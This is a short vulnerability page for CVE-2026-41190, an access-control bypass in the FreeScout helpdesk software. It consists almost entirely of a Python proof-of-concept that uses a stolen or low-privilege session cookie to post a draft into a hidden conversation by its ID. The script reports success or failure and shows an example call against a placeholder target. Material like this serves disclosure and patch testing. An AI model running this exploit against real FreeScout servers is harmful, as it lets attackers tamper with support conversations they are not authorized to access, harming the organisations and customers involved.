CVE-2026-41190 FreeScout 访问控制绕过漏洞

import requests def exploit_freescout(target_url, session_cookie, conversation_id): """ PoC for CVE-2026-41190: Create a draft in a hidden conversation. """ # The endpoint responsible for saving drafts ajax_url = f"{target_url}/api/v1/save_draft" headers = { "Cookie": f"freescout_session={session_cookie}", "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded" } # Payload data to create a draft payload = { "conversation_id": conversation_id, "body": "This is an unauthorized draft created via PoC.", "cc": "", "bcc": "", "type": "email" } try: response = requests.post(ajax_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Successfully created draft in hidden conversation.") print(f"[+] Response: {response.text}") else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Example usage # exploit_freescout("http://target-freescout.com", "attacker_session_id", "123")